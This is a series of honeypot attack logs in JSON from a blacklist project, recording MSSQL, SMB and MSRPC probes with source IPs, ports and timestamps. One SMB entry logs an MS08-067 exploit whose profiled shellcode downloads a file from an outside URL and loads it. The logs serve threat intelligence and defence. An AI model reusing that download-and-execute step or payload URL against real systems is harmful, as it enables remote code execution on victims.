2016-08-01. MSSQL attacked from 117.68.9.76, China

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-20 06:13:18",
        "source of the attack": {
            "ip": "117.68.9.76",
            "domain": "AS4134-CHINANET anhui province networkChina TelecomNo.31",
            "geoloc": "China"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "MSSQL",
        "protocol": "tcp",
        "source port": 61134,
        "destination port": 1433,
        "login": [],
        "mssql command": [],
        "mssql fingerprint": []
    }
}

2016-08-01. SMB attacked from 186.178.28.171, Ecuador

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-20 08:07:14",
        "source of the attack": {
            "ip": "186.178.28.171",
            "domain": "171.28.178.186.static.pichincha.andinanet.net",
            "geoloc": "Ecuador"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "SMB",
        "protocol": "tcp",
        "source port": 3617,
        "destination port": 445,
        "dce/rpc": [
            {
                "DCE/RPC bind": [
                    {
                        "servicename": "SRVSVC",
                        "uuid": "4b324fc8-1670-01d3-1278-5a47bf6ee188",
                        "transfersyntax": "8a885d04-1ceb-11c9-9fe8-08002b104860"
                    }
                ]
            },
            {
                "DCE/RPC request": [
                    {
                        "operationname": "NetPathCompare",
                        "operationnumber": 32,
                        "servicename": "SRVSVC",
                        "uuid": "4b324fc8-1670-01d3-1278-5a47bf6ee188"
                    },
                    {
                        "operationname": "NetPathCanonicalize",
                        "operationnumber": 31,
                        "servicename": "SRVSVC",
                        "uuid": "4b324fc8-1670-01d3-1278-5a47bf6ee188"
                    }
                ]
            }
        ],
        "vulnerability exploited": "MS08-67",
        "profiling": [
            {
                "call": "LoadLibraryA",
                "args": [
                    "urlmon"
                ],
                "return": "0x7df20000"
            },
            {
                "call": "URLDownloadToFile",
                "args": [
                    "",
                    "http://100.100.0.249:5906/yhsiq",
                    "x.",
                    "0",
                    "0"
                ],
                "return": "0"
            },
            {
                "call": "LoadLibraryA",
                "args": [
                    "x."
                ],
                "return": "0x00000000"
            },
            {
                "call": "ExitThread",
                "args": [
                    "0"
                ],
                "return": "0"
            }
        ],
        "url offered": [
            "http://100.100.0.249:5906/yhsiq"
        ],
        "url download": [],
        "action": []
    },
    "virus total analysis": [],
    "static analysis with peframe": []
}

2016-08-01. MSSQL attacked from 117.68.9.76, China

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-20 06:13:10",
        "source of the attack": {
            "ip": "117.68.9.76",
            "domain": "AS4134-CHINANET anhui province networkChina TelecomNo.31",
            "geoloc": "China"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "MSSQL",
        "protocol": "tcp",
        "source port": 59521,
        "destination port": 1433,
        "login": [],
        "mssql command": [],
        "mssql fingerprint": []
    }
}

2016-07-30. SMB attacked from 176.80.157.83, Spain

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-22 22:46:46",
        "source of the attack": {
            "ip": "176.80.157.83",
            "domain": "83.red-176-80-157.dynamicip.rima-tde.net",
            "geoloc": "Spain"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "SMB",
        "protocol": "tcp",
        "source port": 2501,
        "destination port": 445,
        "dce/rpc": [
            {
                "DCE/RPC bind": []
            },
            {
                "DCE/RPC request": []
            }
        ],
        "vulnerability exploited": [],
        "profiling": [],
        "url offered": [],
        "url download": [],
        "action": []
    },
    "virus total analysis": [],
    "static analysis with peframe": []
}

2016-07-30. MSRPC attacked from 123.57.16.72, China

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-22 18:54:23",
        "source of the attack": {
            "ip": "123.57.16.72",
            "domain": "AS37963-Aliyun Computing Co.",
            "geoloc": "China"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "MSRPC",
        "protocol": "tcp",
        "source port": 58652,
        "destination port": 135,
        "dce/rpc": [
            {
                "DCE/RPC bind": []
            },
            {
                "DCE/RPC request": []
            }
        ],
        "vulnerability exploited": [],
        "profiling": [],
        "url offered": [],
        "url download": [],
        "action": []
    },
    "virus total analysis": [],
    "static analysis with peframe": []
}

2016-07-30. SMB attacked from 188.250.41.79, Portugal

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-22 20:32:32",
        "source of the attack": {
            "ip": "188.250.41.79",
            "domain": "bl24-41-79.dsl.telepac.pt",
            "geoloc": "Portugal"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "SMB",
        "protocol": "tcp",
        "source port": 3794,
        "destination port": 445,
        "dce/rpc": [
            {
                "DCE/RPC bind": []
            },
            {
                "DCE/RPC request": []
            }
        ],
        "vulnerability exploited": [],
        "profiling": [],
        "url offered": [],
        "url download": [],
        "action": []
    },
    "virus total analysis": [],
    "static analysis with peframe": []
}

2016-08-01. SMB attacked from 186.178.28.171, Ecuador

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-20 08:07:07",
        "source of the attack": {
            "ip": "186.178.28.171",
            "domain": "171.28.178.186.static.pichincha.andinanet.net",
            "geoloc": "Ecuador"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "SMB",
        "protocol": "tcp",
        "source port": 2973,
        "destination port": 445,
        "dce/rpc": [
            {
                "DCE/RPC bind": []
            },
            {
                "DCE/RPC request": []
            }
        ],
        "vulnerability exploited": [],
        "profiling": [],
        "url offered": [],
        "url download": [],
        "action": []
    },
    "virus total analysis": [],
    "static analysis with peframe": []
}

2016-07-30. MSSQL attacked from 123.126.109.213, China

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-22 21:20:40",
        "source of the attack": {
            "ip": "123.126.109.213",
            "domain": "AS4808-China Unicom Beijing province networkChina Unicom",
            "geoloc": "China"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "MSSQL",
        "protocol": "tcp",
        "source port": 53464,
        "destination port": 1433,
        "login": [],
        "mssql command": [],
        "mssql fingerprint": []
    }
}

2016-07-30. MSSQL attacked from 123.126.109.213, China

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-22 21:20:29",
        "source of the attack": {
            "ip": "123.126.109.213",
            "domain": "AS4808-China Unicom Beijing province networkChina Unicom",
            "geoloc": "China"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "MSSQL",
        "protocol": "tcp",
        "source port": 51006,
        "destination port": 1433,
        "login": [],
        "mssql command": [],
        "mssql fingerprint": []
    }
}

2016-08-01. SMB attacked from 115.178.49.124, Indonesia

{
    "project": "OpenBlackList (https://twitter.com/openblacklist)",
    "author": "ElCatapan (https://twitter.com/ElCatapan)",
    "attack details": {
        "timestamp": "2016-06-20 08:02:56",
        "source of the attack": {
            "ip": "115.178.49.124",
            "domain": "host-49-124.simaya.net.id",
            "geoloc": "Indonesia"
        },
        "honeypot sensor target": "sensor03",
        "service attacked": "SMB",
        "protocol": "tcp",
        "source port": 2764,
        "destination port": 445,
        "dce/rpc": [
            {
                "DCE/RPC bind": []
            },
            {
                "DCE/RPC request": []
            }
        ],
        "vulnerability exploited": [],
        "profiling": [],
        "url offered": [],
        "url download": [],
        "action": []
    },
    "virus total analysis": [],
    "static analysis with peframe": []
}